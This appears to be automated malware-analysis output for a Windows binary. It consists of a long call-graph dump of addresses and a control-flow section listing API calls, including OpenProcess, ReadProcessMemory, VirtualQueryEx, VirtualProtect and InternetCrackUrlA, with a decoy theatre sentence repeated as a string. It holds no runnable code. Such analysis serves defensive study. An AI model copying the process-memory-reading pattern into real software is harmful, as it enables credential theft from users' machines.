13772->13769 13772->13770 14126 412940 13772->14126 13774 413c0a ctype 13773->13774 14135 4139b0 13774->14135 13776 413c95 13777 4139b0 7 API calls 13776->13777 13778 413cbf 13777->13778 13779 4139b0 7 API calls 13778->13779 13780 413ce9 13779->13780 13781 4139b0 7 API calls 13780->13781 13782 413d13 13781->13782 13783 4139b0 7 API calls 13782->13783 13784 413d3d 13783->13784 13785 4139b0 7 API calls 13784->13785 13786 413d67 ctype 13785->13786 13786->12992 13788 414bf3 13787->13788 14139 416d90 13788->14139 13790 414bf8 13791 414c70 7 API calls 13790->13791 13792 414c43 13791->13792 13792->12989 13794 41427a ctype 13793->13794 13796 41438f ctype 13794->13796 14302 414050 13794->14302 13796->12991 13798 4146aa ctype 13797->13798 14314 4143f0 13798->14314 13800 41471d 13801 4143f0 7 API calls 13800->13801 13802 414752 13801->13802 13803 4143f0 7 API calls 13802->13803 13804 414788 13803->13804 13805 4143f0 7 API calls 13804->13805 13806 4147bd 13805->13806 13807 4143f0 7 API calls 13806->13807 13808 4147f3 13807->13808 13809 4143f0 7 API calls 13808->13809 13810 414828 ctype 13809->13810 13810->12994 13812 41487e 13811->13812 13813 4143f0 7 API calls 13812->13813 13814 4148df memset 13813->13814 13815 41490a 13814->13815 13816 4143f0 7 API calls 13815->13816 13817 41496b memset 13816->13817 13818 414996 13817->13818 13819 4143f0 7 API calls 13818->13819 13820 4149f7 memset 13819->13820 13821 414a1c 13820->13821 13821->12995 13823 414a3a ctype 13822->13823 13824 4143f0 7 API calls 13823->13824 13825 414ad3 13824->13825 13826 4143f0 7 API calls 13825->13826 13827 414b08 ctype 13826->13827 13827->12999 13829 40775d ctype 13828->13829 14319 407610 13829->14319 13832 407610 13 API calls 13833 407cdf 13832->13833 13834 407610 13 API calls 13833->13834 13835 407cee 13834->13835 13836 407610 13 API calls 13835->13836 13837 407cfd 13836->13837 13838 407610 13 API calls 13837->13838 13839 407d0c 13838->13839 13840 407610 13 API calls 13839->13840 13841 407d1b 13840->13841 13842 407610 13 API calls 13841->13842 13843 407d2a 13842->13843 13844 407610 13 API calls 13843->13844 13845 407d39 13844->13845 13846 407610 13 API calls 13845->13846 13847 407d48 13846->13847 13848 407610 13 API calls 13847->13848 13849 407d57 13848->13849 13850 407610 13 API calls 13849->13850 13851 407d66 13850->13851 13852 407610 13 API calls 13851->13852 13853 407d75 13852->13853 13854 407610 13 API calls 13853->13854 13855 407d84 13854->13855 13856 407610 13 API calls 13855->13856 13857 407d93 13856->13857 13858 407610 13 API calls 13857->13858 13859 407da2 13858->13859 13860 407610 13 API calls 13859->13860 13861 407db1 13860->13861 13862 407610 13 API calls 13861->13862 13863 407dc0 13862->13863 13864 407610 13 API calls 13863->13864 13865 407dcf 13864->13865 13866 407610 13 API calls 13865->13866 13867 407dde 13866->13867 13868 407610 13 API calls 13867->13868 13869 407ded 13868->13869 13870 407610 13 API calls 13869->13870 13871 407dfc 13870->13871 13872 407610 13 API calls 13871->13872 13873 407e0b 13872->13873 13874 407610 13 API calls 13873->13874 13875 407e1a 13874->13875 13876 407610 13 API calls 13875->13876 13877 407e29 ctype 13876->13877 13878 414c70 7 API calls 13877->13878 13879 407eb7 ctype 13877->13879 13878->13879 13879->13002 13881 414b4a ctype 13880->13881 13882 4143f0 7 API calls 13881->13882 13883 414bbd ctype 13882->13883 13883->13003 13885 418ac7 ctype 13884->13885 13889 418aed 13885->13889 14498 4189d0 13885->14498 13887 418be0 13888 414c70 7 API calls 13887->13888 13887->13889 13888->13889 13889->12997 13896 401030 13890->13896 13893 404888 13894 404898 InternetCrackUrlA 13893->13894 13895 4048b7 13894->13895 13895->13682 13897 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 13896->13897 13897->13893 13898->13701 13899->13707 13900->13713 13902 414c95 13901->13902 13905 405150 13902->13905 13904 414caf 13904->13726 13906 405169 13905->13906 13907 404800 4 API calls 13906->13907 13908 405175 13907->13908 13909 4057d7 memcpy 13908->13909 13914 40585d ctype 13908->13914 13910 4057f8 13909->13910 13911 4057ff memcpy 13910->13911 13912 405817 13911->13912 13913 405837 memcpy 13912->13913 13913->13914 13914->13904 13953 4098d0 ??2@YAPAXI 13915->13953 13917 409931 13917->13733 13919 40f956 13918->13919 13920 40fa73 13919->13920 13967 409d30 13919->13967 13973 40bcb0 13920->13973 13923 40fada 13984 40ea70 13923->13984 13925 40fb4c 13925->13742 13927 40fbb6 13926->13927 13928 40fd3a 13927->13928 13929 409d30 2 API calls 13927->13929 13930 40bcb0 11 API calls 13928->13930 13929->13928 13931 40fda1 13930->13931 13932 40ea70 7 API calls 13931->13932 13933 40fe13 13932->13933 13933->13740 13935 40fe86 13934->13935 13941 41005e 13935->13941 14027 4121d0 13935->14027 13937 40ff78 13937->13941 14041 40d8c0 13937->14041 13939 40ffdf 14049 40f4f0 13939->14049 13941->13739 13943 4100a6 13942->13943 13944 41052e 13943->13944 13945 41014f strtok_s 13943->13945 13944->13737 13952 410174 13945->13952 13946 4104ca 13947 414c70 7 API calls 13946->13947 13948 410504 13947->13948 13949 410515 memset 13948->13949 13949->13944 13950 418380 malloc strncpy 13950->13952 13951 4104af strtok_s 13951->13952 13952->13946 13952->13950 13952->13951 13956 407000 13953->13956 13955 4098fd ctype 13955->13917 13959 406d90 13956->13959 13958 407028 13958->13955 13960 406db3 13959->13960 13962 406da9 13959->13962 13960->13962 13963 406a00 13960->13963 13962->13958 13964 406a19 13963->13964 13965 406a25 13963->13965 13964->13965 13966 406afd memcpy 13964->13966 13965->13962 13966->13965 13969 409d53 13967->13969 13968 409e0a 13968->13920 13969->13968 13970 409dd7 memcmp 13969->13970 13970->13968 13971 409def 13970->13971 13988 409bb0 13971->13988 13975 40bcc6 13973->13975 13974 40bd44 13974->13923 13975->13974 13977 40bcb0 11 API calls 13975->13977 13978 40a6c0 11 API calls 13975->13978 13980 414c70 7 API calls 13975->13980 13992 40a1b0 13975->13992 13998 40ad70 13975->13998 14002 40b370 13975->14002 14008 40b8e0 13975->14008 14014 40b0b0 13975->14014 13977->13975 13978->13975 13980->13975 13987 40ea7f 13984->13987 13985 40eb39 13985->13925 13987->13985 14023 40e270 13987->14023 13989 409bda 13988->13989 13990 409c1f 13989->13990 13991 409c06 memcpy 13989->13991 13990->13968 13991->13990 13997 40a1c6 13992->13997 13993 40a5e1 13995 414c70 7 API calls 13993->13995 13994 40a625 13994->13975 13995->13994 13997->13993 13997->13994 14018 409e60 13997->14018 14001 40ad86 13998->14001 13999 414c70 7 API calls 14000 40b039 13999->14000 14000->13975 14001->13999 14001->14000 14007 40b386 14002->14007 14003 40b817 14004 414c70 7 API calls 14003->14004 14005 40b86f 14003->14005 14004->14005 14005->13975 14006 409e60 2 API calls 14006->14007 14007->14003 14007->14005 14007->14006 14013 40b8f6 14008->14013 14009 409e60 2 API calls 14009->14013 14010 40bbda 14011 414c70 7 API calls 14010->14011 14012 40bc32 14010->14012 14011->14012 14012->13975 14013->14009 14013->14010 14013->14012 14015 40b0c6 14014->14015 14016 414c70 7 API calls 14015->14016 14017 40b2fd 14015->14017 14016->14017 14017->13975 14019 409e70 memcmp 14018->14019 14022 409f04 14018->14022 14020 409e8c 14019->14020 14019->14022 14021 409ea6 memset 14020->14021 14020->14022 14021->14022 14022->13997 14025 40e28d 14023->14025 14024 40e2f1 14024->13987 14025->14024 14026 40dc50 7 API calls 14025->14026 14026->14025 14028 41272b 14027->14028 14029 4121e6 14027->14029 14028->13937 14055 4060f0 14029->14055 14031 412671 14032 4060f0 4 API calls 14031->14032 14033 412698 14032->14033 14034 4060f0 4 API calls 14033->14034 14035 4126bc 14034->14035 14036 4060f0 4 API calls 14035->14036 14037 4126e3 14036->14037 14038 4060f0 4 API calls 14037->14038 14039 412707 14038->14039 14040 4060f0 4 API calls 14039->14040 14040->14028 14045 40d8d6 14041->14045 14042 40d93a 14042->13939 14045->14042 14048 40d8c0 11 API calls 14045->14048 14059 40cd30 14045->14059 14065 40d240 14045->14065 14069 40c7d0 14045->14069 14077 40d5c0 14045->14077 14048->14045 14053 40f506 14049->14053 14050 40f56d 14050->13941 14051 40f4f0 8 API calls 14051->14053 14053->14050 14053->14051 14081 418f70 14053->14081 14085 40f2e0 14053->14085 14056 406109 14055->14056 14057 404800 4 API calls 14056->14057 14058 406115 ctype 14057->14058 14058->14031 14061 40cd46 14059->14061 14060 40d1c0 memset 14062 40d1d1 14060->14062 14061->14060 14061->14062 14063 414c70 7 API calls 14061->14063 14062->14045 14064 40d1af 14063->14064 14064->14060 14068 40d256 14065->14068 14066 40d527 14066->14045 14067 414c70 7 API calls 14067->14066 14068->14066 14068->14067 14071 40c7e4 14069->14071 14070 40ccbf 14070->14045 14071->14070 14072 40c8ee ??2@YAPAXI 14071->14072 14075 40c91f 14072->14075 14073 40cc7b 14074 414c70 7 API calls 14073->14074 14074->14070 14075->14073 14076 40c660 memset memcpy 14075->14076 14076->14075 14078 40d5d6 14077->14078 14079 40d82e 14078->14079 14080 414c70 7 API calls 14078->14080 14079->14045 14080->14079 14089 41d220 14081->14089 14084 418fa3 14084->14053 14087 40f2ff 14085->14087 14086 40f493 14086->14053 14087->14086 14091 40f140 14087->14091 14090 418f7d memset 14089->14090 14090->14084 14092 40f153 14091->14092 14094 40f27c 14092->14094 14095 40eb60 14092->14095 14094->14086 14097 40eb71 14095->14097 14096 40ebaa 14096->14094 14097->14096 14098 414c70 7 API calls 14097->14098 14099 40eb60 7 API calls 14097->14099 14098->14097 14099->14097 14100->13746 14102 401726 ctype 14101->14102 14103 401972 14102->14103 14104 414c70 7 API calls 14102->14104 14103->13754 14104->14102 14106 401344 14105->14106 14107 414c70 7 API calls 14106->14107 14108 4014d2 14106->14108 14110 40152a 14106->14110 14107->14108 14109 40150b memset 14108->14109 14109->14110 14110->13753 14111->13758 14119 41a4a0 14112->14119 14114 4137ba strtok_s 14116 4137ce 14114->14116 14115 413842 ctype 14115->13765 14116->14115 14118 413857 strtok_s 14116->14118 14120 4133c0 14116->14120 14118->14116 14119->14114 14122 4133e2 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z ctype 14120->14122 14121 413419 14121->14116 14122->14121 14123 4133c0 7 API calls 14122->14123 14124 414c70 7 API calls 14122->14124 14123->14122 14124->14122 14125->13768 14129 412956 14126->14129 14127 412cf5 14133 4060f0 4 API calls 14127->14133 14128 412b57 14134 4060f0 4 API calls 14128->14134 14129->14127 14129->14128 14130 412ea8 14129->14130 14131 412c6a 14129->14131 14132 4060f0 4 API calls 14130->14132 14131->13772 14132->14131 14133->14131 14134->14131 14137 4139d9 ctype 14135->14137 14136 4139ff ctype 14136->13776 14137->14136 14138 414c70 7 API calls 14137->14138 14138->14137 14140 416d9e 14139->14140 14143 416b70 ??_U@YAPAXI 14140->14143 14142 416dad 14142->13790 14158 41a110 14143->14158 14145 416bb1 OpenProcess 14146 416be8 allocator 14145->14146 14157 416bcb 14145->14157 14147 416bf5 memset 14146->14147 14148 416d4e ??_V@YAXPAX 14146->14148 14150 416c65 14146->14150 14151 416c79 ReadProcessMemory 14146->14151 14154 4080a0 memcpy codecvt 14146->14154 14155 416d15 14146->14155 14167 416dc0 14146->14167 14173 416600 14146->14173 14160 4169a0 strlen ??_U@YAPAXI 14147->14160 14148->14157 14150->14148 14151->14146 14154->14146 14187 4080a0 14155->14187 14157->14142 14159 41a120 14158->14159 14159->14145 14190 416670 strlen 14160->14190 14162 416a0c 14163 416a24 VirtualQueryEx 14162->14163 14165 416880 ReadProcessMemory 14162->14165 14166 416aa8 14162->14166 14163->14162 14164 416b49 ??_V@YAXPAX 14163->14164 14164->14166 14165->14162 14166->14146 14168 416dd1 allocator 14167->14168 14194 4082d0 14168->14194 14170 416de5 14198 4082a0 14170->14198 14174 416dc0 9 API calls 14173->14174 14175 416613 14174->14175 14277 416e40 14175->14277 14178 41662f 14281 416e70 14178->14281 14179 41664e 14285 4095a0 14179->14285 14184 4080a0 codecvt memcpy 14186 416649 14184->14186 14185 4080a0 codecvt memcpy 14185->14186 14186->14146 14188 4082d0 codecvt memcpy 14187->14188 14189 4080b3 task 14188->14189 14189->14157 14191 4166a1 strlen 14190->14191 14192 416800 14191->14192 14193 4166b7 14191->14193 14192->14162 14193->14191 14195 4082e3 14194->14195 14197 4082e1 codecvt task 14194->14197 14195->14197 14203 407230 memcpy 14195->14203 14197->14170 14204 407210 strlen 14198->14204 14200 4082b0 14205 408660 14200->14205 14202 4082c0 14202->14146 14203->14197 14204->14200 14206 408673 14205->14206 14207 40869a 14206->14207 14208 40867a codecvt 14206->14208 14227 408d10 14207->14227 14214 408c50 14208->14214 14210 4086a8 codecvt 14213 408698 codecvt 14210->14213 14236 407230 memcpy 14210->14236 14213->14202 14215 408c61 allocator 14214->14215 14217 408c6e allocator 14215->14217 14237 408720 14215->14237 14218 408c92 14217->14218 14219 408cb7 14217->14219 14240 408f80 14218->14240 14220 408d10 allocator 7 API calls 14219->14220 14225 408cc5 codecvt 14220->14225 14222 408ca7 14223 408f80 allocator 6 API calls 14222->14223 14224 408cb5 codecvt 14223->14224 14224->14213 14225->14224 14246 407230 memcpy 14225->14246 14228 408d21 allocator 14227->14228 14229 408d2e 14228->14229 14255 408df0 14228->14255 14230 408d39 14229->14230 14234 408d4e 14229->14234 14258 409050 14230->14258 14233 408d4c codecvt 14233->14210 14234->14233 14235 4082d0 codecvt memcpy 14234->14235 14235->14233 14236->14213 14247 41d320 14237->14247 14241 408f94 14240->14241 14243 408f9c codecvt 14240->14243 14242 408720 allocator 5 API calls 14241->14242 14242->14243 14245 408fe9 codecvt 14243->14245 14254 407250 memmove 14243->14254 14245->14222 14246->14224 14248 41a539 std::exception::exception strlen malloc strcpy_s 14247->14248 14249 41d33a 14248->14249 14250 41d394 __CxxThrowException@8 RaiseException 14249->14250 14251 41d34f 14250->14251 14252 41a5c7 std::exception::exception strlen malloc strcpy_s free 14251->14252 14253 408731 14252->14253 14253->14217 14254->14245 14266 41d2d3 14255->14266 14260 409086 allocator 14258->14260 14273 409220 14260->14273 14261 409180 14262 4082d0 codecvt memcpy 14261->14262 14264 40918f codecvt 14262->14264 14263 4090fe codecvt 14263->14261 14276 407230 memcpy 14263->14276 14264->14233 14267 41a539 std::exception::exception strlen malloc strcpy_s 14266->14267 14268 41d2ed 14267->14268 14269 41d394 __CxxThrowException@8 RaiseException 14268->14269 14270 41d302 14269->14270 14271 41a5c7 std::exception::exception strlen malloc strcpy_s free 14270->14271 14272 408e01 14271->14272 14272->14229 14274 409440 allocator 5 API calls 14273->14274 14275 409232 14274->14275 14275->14263 14276->14261 14278 416e4f codecvt allocator 14277->14278 14291 416f00 14278->14291 14280 416621 14280->14178 14280->14179 14282 416e85 14281->14282 14296 416eb0 14282->14296 14286 4095b8 allocator 14285->14286 14287 4082d0 codecvt memcpy 14286->14287 14288 4095cc 14287->14288 14289 408c50 allocator 8 API calls 14288->14289 14290 4095dc 14289->14290 14290->14185 14292 416f5e codecvt 14291->14292 14294 416f14 codecvt 14291->14294 14292->14280 14294->14292 14295 4165e0 memchr 14294->14295 14295->14294 14297 416ec5 allocator 14296->14297 14298 4082d0 codecvt memcpy 14297->14298 14299 416ed9 14298->14299 14300 408c50 allocator 8 API calls 14299->14300 14301 416641 14300->14301 14301->14184 14305 414066 14302->14305 14303 4140b2 ctype 14303->13796 14304 414179 ctype 14304->14303 14307 414c70 7 API calls 14304->14307 14305->14303 14305->14304 14308 413d90 memset memset 14305->14308 14307->14303 14309 413dea 14308->14309 14310 409d30 2 API calls 14309->14310 14313 413f7e ctype 14309->14313 14311 413ea0 ctype 14310->14311 14312 409e60 2 API calls 14311->14312 14311->14313 14312->14313 14313->14305 14317 414412 ctype 14314->14317 14315 414438 14315->13800 14316 4143f0 7 API calls 14316->14317 14317->14315 14317->14316 14318 414c70 7 API calls 14317->14318 14318->14317 14324 407310 14319->14324 14322 407740 14322->13832 14323 40762b 14339 408160 14323->14339 14325 40731d 14324->14325 14326 40732e memset 14325->14326 14338 407380 14326->14338 14327 407580 14364 408120 14327->14364 14330 408160 task memcpy 14331 40759a 14330->14331 14331->14323 14336 4080c0 9 API calls 14336->14338 14337 409270 strcpy_s 14337->14338 14338->14327 14338->14336 14338->14337 14342 4075b0 14338->14342 14347 409290 vsprintf_s 14338->14347 14348 4081a0 14338->14348 14359 4075e0 14338->14359 14340 408560 task memcpy 14339->14340 14341 40816f task 14340->14341 14341->14322 14368 408070 14342->14368 14345 408070 memcpy 14346 4075cd 14345->14346 14346->14338 14347->14338 14349 4081b2 construct 14348->14349 14350 4081c5 construct 14349->14350 14351 408242 14349->14351 14354 4081f9 14350->14354 14372 4084f0 14350->14372 14352 40825a 14351->14352 14353 4084f0 9 API calls 14351->14353 14383 4092d0 14352->14383 14353->14352 14379 409310 14354->14379 14357 40822e 14357->14338 14360 4080a0 codecvt memcpy 14359->14360 14361 4075f2 14360->14361 14362 4080a0 codecvt memcpy 14361->14362 14363 4075fd 14362->14363 14363->14338 14365 408138 construct allocator 14364->14365 14456 4083c0 14365->14456 14367 40758f 14367->14330 14369 408081 allocator 14368->14369 14370 4082d0 codecvt memcpy 14369->14370 14371 4075c2 14370->14371 14371->14345 14373 408501 14372->14373 14374 408514 14373->14374 14377 40851e 14373->14377 14387 408b70 14374->14387 14376 40851c 14376->14354 14377->14376 14390 408860 14377->14390 14380 40931c construct 14379->14380 14440 4094f0 14380->14440 14384 4092dc construct 14383->14384 14449 4094d0 14384->14449 14388 41d2d3 std::_Xinvalid_argument 5 API calls 14387->14388 14389 408b81 14388->14389 14389->14376 14391 40888d 14390->14391 14392 408892 14391->14392 14394 40889f 14391->14394 14393 408b70 5 API calls 14392->14393 14399 40889a task 14393->14399 14394->14399 14401 408ea0 14394->14401 14398 4088e2 14398->14399 14407 408ae0 14398->14407 14399->14376 14410 4093e0 14401->14410 14404 409330 14424 409600 14404->14424 14432 409360 14407->14432 14411 4088bf 14410->14411 14412 4093fc 14410->14412 14411->14404 14413 409405 ??2@YAPAXI 14412->14413 14414 40941e 14412->14414 14413->14411 14413->14414 14418 407180 14414->14418 14419 41a539 std::exception::exception strlen malloc strcpy_s 14418->14419 14420 407193 14419->14420 14421 41d394 14420->14421 14422 41d3c9 RaiseException 14421->14422 14423 41d3bd 14421->14423 14422->14411 14423->14422 14425 409611 _Copy_impl 14424->14425 14428 409790 14425->14428 14431 4097bf 14428->14431 14429 40934f 14429->14398 14430 409310 construct 8 API calls 14430->14431 14431->14429 14431->14430 14433 409371 _Copy_impl 14432->14433 14436 409660 14433->14436 14439 409665 14436->14439 14437 408afb 14437->14399 14438 409850 task memcpy 14438->14439 14439->14437 14439->14438 14442 409504 construct allocator 14440->14442 14441 40932c 14441->14357 14442->14441 14444 409540 14442->14444 14445 4095a0 allocator 8 API calls 14444->14445 14446 409563 14445->14446 14447 4095a0 allocator 8 API calls 14446->14447 14448 409575 14447->14448 14448->14441 14452 4096d0 14449->14452 14454 4096e7 construct allocator 14452->14454 14453 4092ec 14453->14357 14454->14453 14455 409540 allocator 8 API calls 14454->14455 14455->14453 14457 4083d6 14456->14457 14462 4083d1 std::error_category::default_error_condition 14456->14462 14458 408457 14457->14458 14459 4083ff 14457->14459 14480 408560 14458->14480 14465 408a90 14459->14465 14462->14367 14463 408407 construct 14463->14462 14469 408740 14463->14469 14466 408aa5 14465->14466 14484 408e10 14466->14484 14470 408752 construct 14469->14470 14471 4087ef 14470->14471 14472 408769 construct 14470->14472 14473 4084f0 9 API calls 14471->14473 14474 408807 construct 14471->14474 14475 4084f0 9 API calls 14472->14475 14476 40879d construct 14472->14476 14473->14474 14477 409310 construct 8 API calls 14474->14477 14475->14476 14479 409310 construct 8 API calls 14476->14479 14478 4087db 14477->14478 14478->14463 14479->14478 14481 40858c task 14480->14481 14482 40856f task 14480->14482 14481->14462 14483 408ae0 task memcpy 14482->14483 14483->14481 14486 408e29 std::error_category::default_error_condition 14484->14486 14485 408acf 14485->14463 14486->14485 14490 4093a0 14486->14490 14489 408ae0 task memcpy 14489->14485 14491 4093b1 _Copy_impl 14490->14491 14494 409690 14491->14494 14496 409695 construct 14494->14496 14495 408e60 14495->14489 14496->14495 14497 409720 _Copy_impl 8 API calls 14496->14497 14497->14496 14499 4189f9 14498->14499 14500 418a07 malloc 14499->14500 14501 4189ff 14499->14501 14500->14501 14502 418a25 14500->14502 14501->13887 14502->14501 14503 418a6d memset 14502->14503 14503->14501 15111 416593 15113 416551 15111->15113 15112 4155f0 129 API calls 15114 4165b6 15112->15114 15113->15112

            Control-flow Graph

            APIs
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040461C
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404627
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404632
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040463D
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404648
            • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,0041649B), ref: 00404657
            • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,0041649B), ref: 0040465E
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040466C
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404677
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404682
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040468D
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404698
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046AC
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046B7
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046C2
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046CD
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046D8
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
            • strlen.MSVCRT ref: 00404740
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC
            Strings
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
